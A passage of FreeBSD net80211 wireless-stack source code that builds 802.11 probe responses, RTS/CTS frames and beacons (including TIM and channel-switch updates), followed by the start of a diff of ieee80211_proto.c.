= ieee80211_add_xrates(frm, rs); frm = ieee80211_add_rsn(frm, vap); /* * NB: legacy 11b clients do not get certain ie's. 
* The caller identifies such clients by passing * a token in legacy to us. Could expand this to be * any legacy client for stuff like HT ie's. */ if (IEEE80211_IS_CHAN_HT(bss->ni_chan) && legacy != IEEE80211_SEND_LEGACY_11B) { frm = ieee80211_add_htcap(frm, bss); frm = ieee80211_add_htinfo(frm, bss); } frm = ieee80211_add_wpa(frm, vap); if (vap->iv_flags & IEEE80211_F_WME) frm = ieee80211_add_wme_param(frm, &ic->ic_wme); if (IEEE80211_IS_CHAN_HT(bss->ni_chan) && (vap->iv_flags_ht & IEEE80211_FHT_HTCOMPAT) && legacy != IEEE80211_SEND_LEGACY_11B) { frm = ieee80211_add_htcap_vendor(frm, bss); frm = ieee80211_add_htinfo_vendor(frm, bss); } #ifdef IEEE80211_SUPPORT_SUPERG if ((vap->iv_flags & IEEE80211_F_ATHEROS) && legacy != IEEE80211_SEND_LEGACY_11B) frm = ieee80211_add_athcaps(frm, bss); #endif if (vap->iv_appie_proberesp != NULL) frm = add_appie(frm, vap->iv_appie_proberesp); #ifdef IEEE80211_SUPPORT_MESH if (vap->iv_opmode == IEEE80211_M_MBSS) { frm = ieee80211_add_meshid(frm, vap); frm = ieee80211_add_meshconf(frm, vap); } #endif m->m_pkthdr.len = m->m_len = frm - mtod(m, uint8_t *); return m; } /* * Send a probe response frame to the specified mac address. * This does not go through the normal mgt frame api so we * can specify the destination address and re-use the bss node * for the sta reference. */ int ieee80211_send_proberesp(struct ieee80211vap *vap, const uint8_t da[IEEE80211_ADDR_LEN], int legacy) { struct ieee80211_node *bss = vap->iv_bss; struct ieee80211com *ic = vap->iv_ic; struct ieee80211_frame *wh; struct mbuf *m; int ret; if (vap->iv_state == IEEE80211_S_CAC) { IEEE80211_NOTE(vap, IEEE80211_MSG_OUTPUT, bss, "block %s frame in CAC state", "probe response"); vap->iv_stats.is_tx_badstate++; return EIO; /* XXX */ } /* * Hold a reference on the node so it doesn't go away until after * the xmit is complete all the way in the driver. On error we * will remove our reference. */ IEEE80211_DPRINTF(vap, IEEE80211_MSG_NODE, "ieee80211_ref_node (%s:%u) %p<%s> refcnt %d\n", __func__, __LINE__, bss, ether_sprintf(bss->ni_macaddr), ieee80211_node_refcnt(bss)+1); ieee80211_ref_node(bss); m = ieee80211_alloc_proberesp(bss, legacy); if (m == NULL) { ieee80211_free_node(bss); return ENOMEM; } M_PREPEND(m, sizeof(struct ieee80211_frame), M_NOWAIT); KASSERT(m != NULL, ("no room for header")); IEEE80211_TX_LOCK(ic); wh = mtod(m, struct ieee80211_frame *); ieee80211_send_setup(bss, m, IEEE80211_FC0_TYPE_MGT | IEEE80211_FC0_SUBTYPE_PROBE_RESP, IEEE80211_NONQOS_TID, vap->iv_myaddr, da, bss->ni_bssid); /* XXX power management? */ m->m_flags |= M_ENCAP; /* mark encapsulated */ M_WME_SETAC(m, WME_AC_BE); IEEE80211_DPRINTF(vap, IEEE80211_MSG_DEBUG | IEEE80211_MSG_DUMPPKTS, "send probe resp on channel %u to %s%s\n", ieee80211_chan2ieee(ic, ic->ic_curchan), ether_sprintf(da), legacy ? " " : ""); IEEE80211_NODE_STAT(bss, tx_mgmt); ret = ieee80211_raw_output(vap, bss, m, NULL); IEEE80211_TX_UNLOCK(ic); return (ret); } /* * Allocate and build a RTS (Request To Send) control frame. 
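 *
 * Callers (typically drivers implementing RTS/CTS protection) supply
 * the NAV duration themselves; a hypothetical use:
 *
 *	m = ieee80211_alloc_rts(ic, ni->ni_macaddr, vap->iv_myaddr, dur);
 *
 * where dur covers the remainder of the exchange (CTS + data + ACK
 * plus the interframe spaces), already computed by the caller.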
*/ struct mbuf * ieee80211_alloc_rts(struct ieee80211com *ic, const uint8_t ra[IEEE80211_ADDR_LEN], const uint8_t ta[IEEE80211_ADDR_LEN], uint16_t dur) { struct ieee80211_frame_rts *rts; struct mbuf *m; /* XXX honor ic_headroom */ m = m_gethdr(M_NOWAIT, MT_DATA); if (m != NULL) { rts = mtod(m, struct ieee80211_frame_rts *); rts->i_fc[0] = IEEE80211_FC0_VERSION_0 | IEEE80211_FC0_TYPE_CTL | IEEE80211_FC0_SUBTYPE_RTS; rts->i_fc[1] = IEEE80211_FC1_DIR_NODS; *(u_int16_t *)rts->i_dur = htole16(dur); IEEE80211_ADDR_COPY(rts->i_ra, ra); IEEE80211_ADDR_COPY(rts->i_ta, ta); m->m_pkthdr.len = m->m_len = sizeof(struct ieee80211_frame_rts); } return m; } /* * Allocate and build a CTS (Clear To Send) control frame. */ struct mbuf * ieee80211_alloc_cts(struct ieee80211com *ic, const uint8_t ra[IEEE80211_ADDR_LEN], uint16_t dur) { struct ieee80211_frame_cts *cts; struct mbuf *m; /* XXX honor ic_headroom */ m = m_gethdr(M_NOWAIT, MT_DATA); if (m != NULL) { cts = mtod(m, struct ieee80211_frame_cts *); cts->i_fc[0] = IEEE80211_FC0_VERSION_0 | IEEE80211_FC0_TYPE_CTL | IEEE80211_FC0_SUBTYPE_CTS; cts->i_fc[1] = IEEE80211_FC1_DIR_NODS; *(u_int16_t *)cts->i_dur = htole16(dur); IEEE80211_ADDR_COPY(cts->i_ra, ra); m->m_pkthdr.len = m->m_len = sizeof(struct ieee80211_frame_cts); } return m; } static void ieee80211_tx_mgt_timeout(void *arg) { struct ieee80211vap *vap = arg; IEEE80211_LOCK(vap->iv_ic); if (vap->iv_state != IEEE80211_S_INIT && (vap->iv_ic->ic_flags & IEEE80211_F_SCAN) == 0) { /* * NB: it's safe to specify a timeout as the reason here; * it'll only be used in the right state. */ ieee80211_new_state_locked(vap, IEEE80211_S_SCAN, IEEE80211_SCAN_FAIL_TIMEOUT); } IEEE80211_UNLOCK(vap->iv_ic); } /* * This is the callback set on net80211-sourced transmitted * authentication request frames. * * This does a couple of things: * * + If the frame transmitted was a success, it schedules a future * event which will transition the interface to scan. * If a state transition _then_ occurs before that event occurs, * said state transition will cancel this callout. * * + If the frame transmit was a failure, it immediately schedules * the transition back to scan. */ static void ieee80211_tx_mgt_cb(struct ieee80211_node *ni, void *arg, int status) { struct ieee80211vap *vap = ni->ni_vap; enum ieee80211_state ostate = (enum ieee80211_state) arg; /* * Frame transmit completed; arrange timer callback. If * transmit was successfuly we wait for response. Otherwise * we arrange an immediate callback instead of doing the * callback directly since we don't know what state the driver * is in (e.g. what locks it is holding). This work should * not be too time-critical and not happen too often so the * added overhead is acceptable. * * XXX what happens if !acked but response shows up before callback? */ if (vap->iv_state == ostate) { callout_reset(&vap->iv_mgtsend, status == 0 ? 
IEEE80211_TRANS_WAIT*hz : 0, ieee80211_tx_mgt_timeout, vap); } } static void ieee80211_beacon_construct(struct mbuf *m, uint8_t *frm, struct ieee80211_beacon_offsets *bo, struct ieee80211_node *ni) { struct ieee80211vap *vap = ni->ni_vap; struct ieee80211com *ic = ni->ni_ic; struct ieee80211_rateset *rs = &ni->ni_rates; uint16_t capinfo; /* * beacon frame format * [8] time stamp * [2] beacon interval * [2] cabability information * [tlv] ssid * [tlv] supported rates * [3] parameter set (DS) * [8] CF parameter set (optional) * [tlv] parameter set (IBSS/TIM) * [tlv] country (optional) * [3] power control (optional) * [5] channel switch announcement (CSA) (optional) * [tlv] extended rate phy (ERP) * [tlv] extended supported rates * [tlv] RSN parameters * [tlv] HT capabilities * [tlv] HT information * XXX Vendor-specific OIDs (e.g. Atheros) * [tlv] WPA parameters * [tlv] WME parameters * [tlv] Vendor OUI HT capabilities (optional) * [tlv] Vendor OUI HT information (optional) * [tlv] Atheros capabilities (optional) * [tlv] TDMA parameters (optional) * [tlv] Mesh ID (MBSS) * [tlv] Mesh Conf (MBSS) * [tlv] application data (optional) */ memset(bo, 0, sizeof(*bo)); memset(frm, 0, 8); /* XXX timestamp is set by hardware/driver */ frm += 8; *(uint16_t *)frm = htole16(ni->ni_intval); frm += 2; capinfo = ieee80211_getcapinfo(vap, ni->ni_chan); bo->bo_caps = (uint16_t *)frm; *(uint16_t *)frm = htole16(capinfo); frm += 2; *frm++ = IEEE80211_ELEMID_SSID; if ((vap->iv_flags & IEEE80211_F_HIDESSID) == 0) { *frm++ = ni->ni_esslen; memcpy(frm, ni->ni_essid, ni->ni_esslen); frm += ni->ni_esslen; } else *frm++ = 0; frm = ieee80211_add_rates(frm, rs); if (!IEEE80211_IS_CHAN_FHSS(ni->ni_chan)) { *frm++ = IEEE80211_ELEMID_DSPARMS; *frm++ = 1; *frm++ = ieee80211_chan2ieee(ic, ni->ni_chan); } if (ic->ic_flags & IEEE80211_F_PCF) { bo->bo_cfp = frm; frm = ieee80211_add_cfparms(frm, ic); } bo->bo_tim = frm; if (vap->iv_opmode == IEEE80211_M_IBSS) { *frm++ = IEEE80211_ELEMID_IBSSPARMS; *frm++ = 2; *frm++ = 0; *frm++ = 0; /* TODO: ATIM window */ bo->bo_tim_len = 0; } else if (vap->iv_opmode == IEEE80211_M_HOSTAP || vap->iv_opmode == IEEE80211_M_MBSS) { /* TIM IE is the same for Mesh and Hostap */ struct ieee80211_tim_ie *tie = (struct ieee80211_tim_ie *) frm; tie->tim_ie = IEEE80211_ELEMID_TIM; tie->tim_len = 4; /* length */ tie->tim_count = 0; /* DTIM count */ tie->tim_period = vap->iv_dtim_period; /* DTIM period */ tie->tim_bitctl = 0; /* bitmap control */ tie->tim_bitmap[0] = 0; /* Partial Virtual Bitmap */ frm += sizeof(struct ieee80211_tim_ie); bo->bo_tim_len = 1; } bo->bo_tim_trailer = frm; if ((vap->iv_flags & IEEE80211_F_DOTH) || (vap->iv_flags_ext & IEEE80211_FEXT_DOTD)) frm = ieee80211_add_countryie(frm, ic); if (vap->iv_flags & IEEE80211_F_DOTH) { if (IEEE80211_IS_CHAN_5GHZ(ni->ni_chan)) frm = ieee80211_add_powerconstraint(frm, vap); bo->bo_csa = frm; if (ic->ic_flags & IEEE80211_F_CSAPENDING) frm = ieee80211_add_csa(frm, vap); } else bo->bo_csa = frm; if (vap->iv_flags & IEEE80211_F_DOTH) { bo->bo_quiet = frm; if (IEEE80211_IS_CHAN_DFS(ic->ic_bsschan) && (vap->iv_flags_ext & IEEE80211_FEXT_DFS)) { if (vap->iv_quiet) frm = ieee80211_add_quiet(frm,vap); } } else bo->bo_quiet = frm; if (IEEE80211_IS_CHAN_ANYG(ni->ni_chan)) { bo->bo_erp = frm; frm = ieee80211_add_erp(frm, ic); } frm = ieee80211_add_xrates(frm, rs); frm = ieee80211_add_rsn(frm, vap); if (IEEE80211_IS_CHAN_HT(ni->ni_chan)) { frm = ieee80211_add_htcap(frm, ni); bo->bo_htinfo = frm; frm = ieee80211_add_htinfo(frm, ni); } frm = ieee80211_add_wpa(frm, 
vap); if (vap->iv_flags & IEEE80211_F_WME) { bo->bo_wme = frm; frm = ieee80211_add_wme_param(frm, &ic->ic_wme); } if (IEEE80211_IS_CHAN_HT(ni->ni_chan) && (vap->iv_flags_ht & IEEE80211_FHT_HTCOMPAT)) { frm = ieee80211_add_htcap_vendor(frm, ni); frm = ieee80211_add_htinfo_vendor(frm, ni); } #ifdef IEEE80211_SUPPORT_SUPERG if (vap->iv_flags & IEEE80211_F_ATHEROS) { bo->bo_ath = frm; frm = ieee80211_add_athcaps(frm, ni); } #endif #ifdef IEEE80211_SUPPORT_TDMA if (vap->iv_caps & IEEE80211_C_TDMA) { bo->bo_tdma = frm; frm = ieee80211_add_tdma(frm, vap); } #endif if (vap->iv_appie_beacon != NULL) { bo->bo_appie = frm; bo->bo_appie_len = vap->iv_appie_beacon->ie_len; frm = add_appie(frm, vap->iv_appie_beacon); } #ifdef IEEE80211_SUPPORT_MESH if (vap->iv_opmode == IEEE80211_M_MBSS) { frm = ieee80211_add_meshid(frm, vap); bo->bo_meshconf = frm; frm = ieee80211_add_meshconf(frm, vap); } #endif bo->bo_tim_trailer_len = frm - bo->bo_tim_trailer; bo->bo_csa_trailer_len = frm - bo->bo_csa; m->m_pkthdr.len = m->m_len = frm - mtod(m, uint8_t *); } /* * Allocate a beacon frame and fillin the appropriate bits. */ struct mbuf * ieee80211_beacon_alloc(struct ieee80211_node *ni, struct ieee80211_beacon_offsets *bo) { struct ieee80211vap *vap = ni->ni_vap; struct ieee80211com *ic = ni->ni_ic; struct ifnet *ifp = vap->iv_ifp; struct ieee80211_frame *wh; struct mbuf *m; int pktlen; uint8_t *frm; /* * beacon frame format * [8] time stamp * [2] beacon interval * [2] cabability information * [tlv] ssid * [tlv] supported rates * [3] parameter set (DS) * [8] CF parameter set (optional) * [tlv] parameter set (IBSS/TIM) * [tlv] country (optional) * [3] power control (optional) * [5] channel switch announcement (CSA) (optional) * [tlv] extended rate phy (ERP) * [tlv] extended supported rates * [tlv] RSN parameters * [tlv] HT capabilities * [tlv] HT information * [tlv] Vendor OUI HT capabilities (optional) * [tlv] Vendor OUI HT information (optional) * XXX Vendor-specific OIDs (e.g. Atheros) * [tlv] WPA parameters * [tlv] WME parameters * [tlv] TDMA parameters (optional) * [tlv] Mesh ID (MBSS) * [tlv] Mesh Conf (MBSS) * [tlv] application data (optional) * NB: we allocate the max space required for the TIM bitmap. * XXX how big is this? */ pktlen = 8 /* time stamp */ + sizeof(uint16_t) /* beacon interval */ + sizeof(uint16_t) /* capabilities */ + 2 + ni->ni_esslen /* ssid */ + 2 + IEEE80211_RATE_SIZE /* supported rates */ + 2 + 1 /* DS parameters */ + 2 + 6 /* CF parameters */ + 2 + 4 + vap->iv_tim_len /* DTIM/IBSSPARMS */ + IEEE80211_COUNTRY_MAX_SIZE /* country */ + 2 + 1 /* power control */ + sizeof(struct ieee80211_csa_ie) /* CSA */ + sizeof(struct ieee80211_quiet_ie) /* Quiet */ + 2 + 1 /* ERP */ + 2 + (IEEE80211_RATE_MAXSIZE - IEEE80211_RATE_SIZE) + (vap->iv_caps & IEEE80211_C_WPA ? /* WPA 1+2 */ 2*sizeof(struct ieee80211_ie_wpa) : 0) /* XXX conditional? */ + 4+2*sizeof(struct ieee80211_ie_htcap)/* HT caps */ + 4+2*sizeof(struct ieee80211_ie_htinfo)/* HT info */ + (vap->iv_caps & IEEE80211_C_WME ? /* WME */ sizeof(struct ieee80211_wme_param) : 0) #ifdef IEEE80211_SUPPORT_SUPERG + sizeof(struct ieee80211_ath_ie) /* ATH */ #endif #ifdef IEEE80211_SUPPORT_TDMA + (vap->iv_caps & IEEE80211_C_TDMA ? 
/* TDMA */ sizeof(struct ieee80211_tdma_param) : 0) #endif #ifdef IEEE80211_SUPPORT_MESH + 2 + ni->ni_meshidlen + sizeof(struct ieee80211_meshconf_ie) #endif + IEEE80211_MAX_APPIE ; m = ieee80211_getmgtframe(&frm, ic->ic_headroom + sizeof(struct ieee80211_frame), pktlen); if (m == NULL) { IEEE80211_DPRINTF(vap, IEEE80211_MSG_ANY, "%s: cannot get buf; size %u\n", __func__, pktlen); vap->iv_stats.is_tx_nobuf++; return NULL; } ieee80211_beacon_construct(m, frm, bo, ni); M_PREPEND(m, sizeof(struct ieee80211_frame), M_NOWAIT); KASSERT(m != NULL, ("no space for 802.11 header?")); wh = mtod(m, struct ieee80211_frame *); wh->i_fc[0] = IEEE80211_FC0_VERSION_0 | IEEE80211_FC0_TYPE_MGT | IEEE80211_FC0_SUBTYPE_BEACON; wh->i_fc[1] = IEEE80211_FC1_DIR_NODS; *(uint16_t *)wh->i_dur = 0; IEEE80211_ADDR_COPY(wh->i_addr1, ifp->if_broadcastaddr); IEEE80211_ADDR_COPY(wh->i_addr2, vap->iv_myaddr); IEEE80211_ADDR_COPY(wh->i_addr3, ni->ni_bssid); *(uint16_t *)wh->i_seq = 0; return m; } /* * Update the dynamic parts of a beacon frame based on the current state. */ int ieee80211_beacon_update(struct ieee80211_node *ni, struct ieee80211_beacon_offsets *bo, struct mbuf *m, int mcast) { struct ieee80211vap *vap = ni->ni_vap; struct ieee80211com *ic = ni->ni_ic; int len_changed = 0; uint16_t capinfo; struct ieee80211_frame *wh; ieee80211_seq seqno; IEEE80211_LOCK(ic); /* * Handle 11h channel change when we've reached the count. * We must recalculate the beacon frame contents to account * for the new channel. Note we do this only for the first * vap that reaches this point; subsequent vaps just update * their beacon state to reflect the recalculated channel. */ if (isset(bo->bo_flags, IEEE80211_BEACON_CSA) && vap->iv_csa_count == ic->ic_csa_count) { vap->iv_csa_count = 0; /* * Effect channel change before reconstructing the beacon * frame contents as many places reference ni_chan. */ if (ic->ic_csa_newchan != NULL) ieee80211_csa_completeswitch(ic); /* * NB: ieee80211_beacon_construct clears all pending * updates in bo_flags so we don't need to explicitly * clear IEEE80211_BEACON_CSA. */ ieee80211_beacon_construct(m, mtod(m, uint8_t*) + sizeof(struct ieee80211_frame), bo, ni); /* XXX do WME aggressive mode processing? */ IEEE80211_UNLOCK(ic); return 1; /* just assume length changed */ } wh = mtod(m, struct ieee80211_frame *); seqno = ni->ni_txseqs[IEEE80211_NONQOS_TID]++; *(uint16_t *)&wh->i_seq[0] = htole16(seqno << IEEE80211_SEQ_SEQ_SHIFT); M_SEQNO_SET(m, seqno); /* XXX faster to recalculate entirely or just changes? */ capinfo = ieee80211_getcapinfo(vap, ni->ni_chan); *bo->bo_caps = htole16(capinfo); if (vap->iv_flags & IEEE80211_F_WME) { struct ieee80211_wme_state *wme = &ic->ic_wme; /* * Check for agressive mode change. When there is * significant high priority traffic in the BSS * throttle back BE traffic by using conservative * parameters. Otherwise BE uses agressive params * to optimize performance of legacy/non-QoS traffic. 
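 *
 * For example, with a switch threshold of 15 and a hysteresis value of
 * 10 (illustrative numbers only): once more than 15 high-priority
 * frames are seen in a measurement window, aggressive mode is turned
 * off and the counter is primed with 10, so a brief lull does not
 * immediately flip the BSS back to the aggressive parameters.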
*/ if (wme->wme_flags & WME_F_AGGRMODE) { if (wme->wme_hipri_traffic > wme->wme_hipri_switch_thresh) { IEEE80211_DPRINTF(vap, IEEE80211_MSG_WME, "%s: traffic %u, disable aggressive mode\n", __func__, wme->wme_hipri_traffic); wme->wme_flags &= ~WME_F_AGGRMODE; ieee80211_wme_updateparams_locked(vap); wme->wme_hipri_traffic = wme->wme_hipri_switch_hysteresis; } else wme->wme_hipri_traffic = 0; } else { if (wme->wme_hipri_traffic <= wme->wme_hipri_switch_thresh) { IEEE80211_DPRINTF(vap, IEEE80211_MSG_WME, "%s: traffic %u, enable aggressive mode\n", __func__, wme->wme_hipri_traffic); wme->wme_flags |= WME_F_AGGRMODE; ieee80211_wme_updateparams_locked(vap); wme->wme_hipri_traffic = 0; } else wme->wme_hipri_traffic = wme->wme_hipri_switch_hysteresis; } if (isset(bo->bo_flags, IEEE80211_BEACON_WME)) { (void) ieee80211_add_wme_param(bo->bo_wme, wme); clrbit(bo->bo_flags, IEEE80211_BEACON_WME); } } if (isset(bo->bo_flags, IEEE80211_BEACON_HTINFO)) { ieee80211_ht_update_beacon(vap, bo); clrbit(bo->bo_flags, IEEE80211_BEACON_HTINFO); } #ifdef IEEE80211_SUPPORT_TDMA if (vap->iv_caps & IEEE80211_C_TDMA) { /* * NB: the beacon is potentially updated every TBTT. */ ieee80211_tdma_update_beacon(vap, bo); } #endif #ifdef IEEE80211_SUPPORT_MESH if (vap->iv_opmode == IEEE80211_M_MBSS) ieee80211_mesh_update_beacon(vap, bo); #endif if (vap->iv_opmode == IEEE80211_M_HOSTAP || vap->iv_opmode == IEEE80211_M_MBSS) { /* NB: no IBSS support*/ struct ieee80211_tim_ie *tie = (struct ieee80211_tim_ie *) bo->bo_tim; if (isset(bo->bo_flags, IEEE80211_BEACON_TIM)) { u_int timlen, timoff, i; /* * ATIM/DTIM needs updating. If it fits in the * current space allocated then just copy in the * new bits. Otherwise we need to move any trailing * data to make room. Note that we know there is * contiguous space because ieee80211_beacon_allocate * insures there is space in the mbuf to write a * maximal-size virtual bitmap (based on iv_max_aid). */ /* * Calculate the bitmap size and offset, copy any * trailer out of the way, and then copy in the * new bitmap and update the information element. * Note that the tim bitmap must contain at least * one byte and any offset must be even. 
*/ if (vap->iv_ps_pending != 0) { timoff = 128; /* impossibly large */ for (i = 0; i < vap->iv_tim_len; i++) if (vap->iv_tim_bitmap[i]) { timoff = i &~ 1; break; } KASSERT(timoff != 128, ("tim bitmap empty!")); for (i = vap->iv_tim_len-1; i >= timoff; i--) if (vap->iv_tim_bitmap[i]) break; timlen = 1 + (i - timoff); } else { timoff = 0; timlen = 1; } if (timlen != bo->bo_tim_len) { /* copy up/down trailer */ int adjust = tie->tim_bitmap+timlen - bo->bo_tim_trailer; ovbcopy(bo->bo_tim_trailer, bo->bo_tim_trailer+adjust, bo->bo_tim_trailer_len); bo->bo_tim_trailer += adjust; bo->bo_erp += adjust; bo->bo_htinfo += adjust; #ifdef IEEE80211_SUPPORT_SUPERG bo->bo_ath += adjust; #endif #ifdef IEEE80211_SUPPORT_TDMA bo->bo_tdma += adjust; #endif #ifdef IEEE80211_SUPPORT_MESH bo->bo_meshconf += adjust; #endif bo->bo_appie += adjust; bo->bo_wme += adjust; bo->bo_csa += adjust; bo->bo_quiet += adjust; bo->bo_tim_len = timlen; /* update information element */ tie->tim_len = 3 + timlen; tie->tim_bitctl = timoff; len_changed = 1; } memcpy(tie->tim_bitmap, vap->iv_tim_bitmap + timoff, bo->bo_tim_len); clrbit(bo->bo_flags, IEEE80211_BEACON_TIM); IEEE80211_DPRINTF(vap, IEEE80211_MSG_POWER, "%s: TIM updated, pending %u, off %u, len %u\n", __func__, vap->iv_ps_pending, timoff, timlen); } /* count down DTIM period */ if (tie->tim_count == 0) tie->tim_count = tie->tim_period - 1; else tie->tim_count--; /* update state for buffered multicast frames on DTIM */ if (mcast && tie->tim_count == 0) tie->tim_bitctl |= 1; else tie->tim_bitctl &= ~1; if (isset(bo->bo_flags, IEEE80211_BEACON_CSA)) { struct ieee80211_csa_ie *csa = (struct ieee80211_csa_ie *) bo->bo_csa; /* * Insert or update CSA ie. If we're just starting * to count down to the channel switch then we need * to insert the CSA ie. Otherwise we just need to * drop the count. The actual change happens above * when the vap's count reaches the target count. */ if (vap->iv_csa_count == 0) { memmove(&csa[1], csa, bo->bo_csa_trailer_len); bo->bo_erp += sizeof(*csa); bo->bo_htinfo += sizeof(*csa); bo->bo_wme += sizeof(*csa); #ifdef IEEE80211_SUPPORT_SUPERG bo->bo_ath += sizeof(*csa); #endif #ifdef IEEE80211_SUPPORT_TDMA bo->bo_tdma += sizeof(*csa); #endif #ifdef IEEE80211_SUPPORT_MESH bo->bo_meshconf += sizeof(*csa); #endif bo->bo_appie += sizeof(*csa); bo->bo_csa_trailer_len += sizeof(*csa); bo->bo_quiet += sizeof(*csa); bo->bo_tim_trailer_len += sizeof(*csa); m->m_len += sizeof(*csa); m->m_pkthdr.len += sizeof(*csa); ieee80211_add_csa(bo->bo_csa, vap); } else csa->csa_count--; vap->iv_csa_count++; /* NB: don't clear IEEE80211_BEACON_CSA */ } if (IEEE80211_IS_CHAN_DFS(ic->ic_bsschan) && (vap->iv_flags_ext & IEEE80211_FEXT_DFS) ){ if (vap->iv_quiet) ieee80211_add_quiet(bo->bo_quiet, vap); } if (isset(bo->bo_flags, IEEE80211_BEACON_ERP)) { /* * ERP element needs updating. 
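The offset/length computation above is easiest to see with numbers. If iv_tim_bitmap[] is non-zero only at bytes 5 and 9 (AIDs 40-47 and 72-79 have frames queued), then timoff = 5 & ~1 = 4 and timlen = 1 + (9 - 4) = 6, so the IE carries bitmap bytes 4..9, tim_len = 3 + 6 = 9, and tim_bitctl holds the even offset 4; because the offset is forced even, bit 0 stays clear for the multicast indicator set further below and bits 1-7 carry offset/2, which is the N1/2 encoding 802.11 specifies for the Bitmap Control field. A stand-alone restatement of the rule, for illustration only:

static void
tim_window(const uint8_t *bitmap, int nbytes, u_int *timoff, u_int *timlen)
{
        int i, lo, hi;

        lo = 0;
        for (i = 0; i < nbytes; i++)
                if (bitmap[i] != 0) {
                        lo = i & ~1;            /* offset must be even */
                        break;
                }
        for (hi = nbytes - 1; hi > lo; hi--)    /* last non-zero byte */
                if (bitmap[hi] != 0)
                        break;
        *timoff = lo;
        *timlen = 1 + (hi - lo);                /* always at least one byte */
}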
*/ (void) ieee80211_add_erp(bo->bo_erp, ic); clrbit(bo->bo_flags, IEEE80211_BEACON_ERP); } #ifdef IEEE80211_SUPPORT_SUPERG if (isset(bo->bo_flags, IEEE80211_BEACON_ATH)) { ieee80211_add_athcaps(bo->bo_ath, ni); clrbit(bo->bo_flags, IEEE80211_BEACON_ATH); } #endif } if (isset(bo->bo_flags, IEEE80211_BEACON_APPIE)) { const struct ieee80211_appie *aie = vap->iv_appie_beacon; int aielen; uint8_t *frm; aielen = 0; if (aie != NULL) aielen += aie->ie_len; if (aielen != bo->bo_appie_len) { /* copy up/down trailer */ int adjust = aielen - bo->bo_appie_len; ovbcopy(bo->bo_tim_trailer, bo->bo_tim_trailer+adjust, bo->bo_tim_trailer_len); bo->bo_tim_trailer += adjust; bo->bo_appie += adjust; bo->bo_appie_len = aielen; len_changed = 1; } frm = bo->bo_appie; if (aie != NULL) frm = add_appie(frm, aie); clrbit(bo->bo_flags, IEEE80211_BEACON_APPIE); } IEEE80211_UNLOCK(ic); return len_changed; } /* * Do Ethernet-LLC encapsulation for each payload in a fast frame * tunnel encapsulation. The frame is assumed to have an Ethernet * header at the front that must be stripped before prepending the * LLC followed by the Ethernet header passed in (with an Ethernet * type that specifies the payload size). */ struct mbuf * ieee80211_ff_encap1(struct ieee80211vap *vap, struct mbuf *m, const struct ether_header *eh) { struct llc *llc; uint16_t payload; /* XXX optimize by combining m_adj+M_PREPEND */ m_adj(m, sizeof(struct ether_header) - sizeof(struct llc)); llc = mtod(m, struct llc *); llc->llc_dsap = llc->llc_ssap = LLC_SNAP_LSAP; llc->llc_control = LLC_UI; llc->llc_snap.org_code[0] = 0; llc->llc_snap.org_code[1] = 0; llc->llc_snap.org_code[2] = 0; llc->llc_snap.ether_type = eh->ether_type; payload = m->m_pkthdr.len; /* NB: w/o Ethernet header */ M_PREPEND(m, sizeof(struct ether_header), M_NOWAIT); if (m == NULL) { /* XXX cannot happen */ IEEE80211_DPRINTF(vap, IEEE80211_MSG_SUPERG, "%s: no space for ether_header\n", __func__); vap->iv_stats.is_tx_nobuf++; return NULL; } ETHER_HEADER_COPY(mtod(m, void *), eh); mtod(m, struct ether_header *)->ether_type = htons(payload); return m; } /* * Complete an mbuf transmission. * * For now, this simply processes a completed frame after the * driver has completed it's transmission and/or retransmission. * It assumes the frame is an 802.11 encapsulated frame. * * Later on it will grow to become the exit path for a given frame * from the driver and, depending upon how it's been encapsulated * and already transmitted, it may end up doing A-MPDU retransmission, * power save requeuing, etc. * * In order for the above to work, the driver entry point to this * must not hold any driver locks. Thus, the driver needs to delay * any actual mbuf completion until it can release said locks. * * This frees the mbuf and if the mbuf has a node reference, * the node reference will be freed. */ void ieee80211_tx_complete(struct ieee80211_node *ni, struct mbuf *m, int status) { if (ni != NULL) { if (m->m_flags & M_TXCB) ieee80211_process_callback(ni, m, status); ieee80211_free_node(ni); } m_freem(m); } diff --git a/sys/net80211/ieee80211_proto.c b/sys/net80211/ieee80211_proto.c index 751c44d73971..2f84769f9907 100644 --- a/sys/net80211/ieee80211_proto.c +++ b/sys/net80211/ieee80211_proto.c @@ -1,1996 +1,1996 @@ /*- * Copyright (c) 2001 Atsushi Onoe * Copyright (c) 2002-2008 Sam Leffler, Errno Consulting * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. 
Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ #include __FBSDID("$FreeBSD$"); /* * IEEE 802.11 protocol support. */ #include "opt_inet.h" #include "opt_wlan.h" #include #include #include #include #include #include #include #include #include /* XXX for ether_sprintf */ #include #include #include #include #include #ifdef IEEE80211_SUPPORT_MESH #include #endif #include #include /* XXX tunables */ #define AGGRESSIVE_MODE_SWITCH_HYSTERESIS 3 /* pkts / 100ms */ #define HIGH_PRI_SWITCH_THRESH 10 /* pkts / 100ms */ const char *ieee80211_mgt_subtype_name[] = { "assoc_req", "assoc_resp", "reassoc_req", "reassoc_resp", "probe_req", "probe_resp", "reserved#6", "reserved#7", "beacon", "atim", "disassoc", "auth", "deauth", "action", "action_noack", "reserved#15" }; const char *ieee80211_ctl_subtype_name[] = { "reserved#0", "reserved#1", "reserved#2", "reserved#3", "reserved#3", "reserved#5", "reserved#6", "reserved#7", "reserved#8", "reserved#9", "ps_poll", "rts", "cts", "ack", "cf_end", "cf_end_ack" }; const char *ieee80211_opmode_name[IEEE80211_OPMODE_MAX] = { "IBSS", /* IEEE80211_M_IBSS */ "STA", /* 